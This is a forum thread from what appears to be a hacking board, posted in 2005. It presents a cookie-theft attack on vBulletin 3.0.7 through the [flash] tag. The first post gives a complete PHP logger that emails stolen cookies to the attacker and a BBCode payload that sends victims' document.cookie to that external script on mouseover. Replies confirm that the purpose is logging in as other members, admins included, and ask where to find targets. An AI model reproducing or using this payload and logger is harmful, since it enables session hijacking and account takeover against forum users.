Vbulletin 3.0.7 -- Cookie

Discussion in 'Forum for discussion of ANTICHAT' started by néM3S!s, 10 Oct 2005.

  1. néM3S!s

    néM3S!s Banned

    Joined:
    7 Sep 2005
    Messages:
    31
    Likes Received:
    10
    Reputations:
    12
    Vbulletin 3.0.7 --> catch cookie (ie)
    Only if the balise [flash] is used :(


    Create a file log.php and insert the following code :

    Code:
    <?php
    /* S4aLog v1.0 [ Beta ]
    -----------------------
    **Beta Of S4aLog v1.0 With Str_Repalce <;>
    ! You Can Get Cookies And Refresh The Broweser ! v0.10
    [ New New New ]
    !Named Your Attack With $nm e.x http://site/log?re=http://www.s4a.cc/&nm=Attack1&id=Cookies
    [ MSG ]
    Name : Attack1
    Cookies : Cookies
    Refresh : http://www.s4a.xx
    [ MSG ]!
    !
    Get Cookies Like This :: bbpassword[000000] bbhash[0000] || Old bbpassword=12121; bbhash=12121;
    !
    [ New New New ]
    */
    $YourMail = "devil-00@hotmail.co.uk";  // Your E-mail
    /*-----------------------*/
    $Ip = $REMOTE_ADDR;
    $Cooki_e = $_GET['id'];
    $NameOfAttack = $_GET['nm'];
    $Refresh = $_GET['re'];
    /* Start */
    $ReplaceCookie1 = array("=",";");
    $ReplaceCookie2 = array("[ "," ]  ");
    $Cooki_e = str_replace($ReplaceCookie1,$ReplaceCookie2,$Cooki    _e); // Replace
    /* e.x hash=0210; | hash[0210]*/
    //***************************************//
    $Hdr = "From: S4aLog <log-v1@s4a.cc>";
    $Msg =
    "
    Mr Attacker ;) ,,, S4aLog v1 Beta <<
    [ ".$NameOfAttack." ] ,, Name Of Attack
    [ ".$Refresh." ] ,, Refresh Page
    [ ".$Ip." ] ,, Ip
    [ S4aLog < By Devil-00 > -- Thnx For -- <Yes2Hack> <xxx (hacker)> <s4a Members> ]
    [ devil-00@hotmail.co.uk - devil.00@gmail.com ]
    -----------------------------------------------
    Cookie ::
    ".$Cooki_e."
    ";
    /* ------------------------------------------------------------------------- */
    $Send = mail($YourMail,"S4aLog -- NewLog",$Msg,$Hdr);
    /**************************************************      ***************************/
    if($Send){
    if($Refresh <> ""){header("location:".$Refresh);}
    }
    ?>
    To add following a message that you post on the forum targets the following code :

    Code:
    [flash=http://www.site.com/flash.swf]onmouseover='location.href="http://www.site.com/log.php?nm=Black-code.net&re=http://www.linux-soul.net/vb/showthread.php?t=1245&id="+document.Cookie'[/flash]
    Good work ! :D
     
    1 person likes this.
  2. Дрэгги

    Дрэгги Elder - Старейшина

    Joined:
    26 Aug 2005
    Messages:
    284
    Likes Received:
    396
    Reputations:
    182
    What is this all about? I'm really curious!
     
  3. PEPSICOLA

    PEPSICOLA . . . . . 2L . . . . .

    Joined:
    14 Oct 2004
    Messages:
    1,025
    Likes Received:
    819
    Reputations:
    368
    how i see... its a article (or something =)) how to steal cookies in vbulletin 3.0.7, but only if the balise [flash] is used... =)

    and if flash is used, you just need post message (look néM3S!s post)... короче на снифер

    and when your mouse over the flash - cookie will send to sniffer, right? =)
     
  4. néM3S!s

    néM3S!s Banned

    Joined:
    7 Sep 2005
    Messages:
    31
    Likes Received:
    10
    Reputations:
    12
    yes it is exactly that :)
     
  5. byte57

    byte57 Elder - Старейшина

    Joined:
    22 Jan 2005
    Messages:
    568
    Likes Received:
    13
    Reputations:
    24
    respect, i'll try to find forums with flash, if somebody already did, give some links here plz.
     
  6. Дрэгги

    Дрэгги Elder - Старейшина

    Joined:
    26 Aug 2005
    Messages:
    284
    Likes Received:
    396
    Reputations:
    182
    And what's the use of stealing cookies? To be automatically logged in as another member (admin, for example) there, right?

    I'm not sure this will help me to be back on that forum I was banned from though, because it's not vbulletin 3.0.7 it's 3.5.0 as well as I remember...
     
Loading...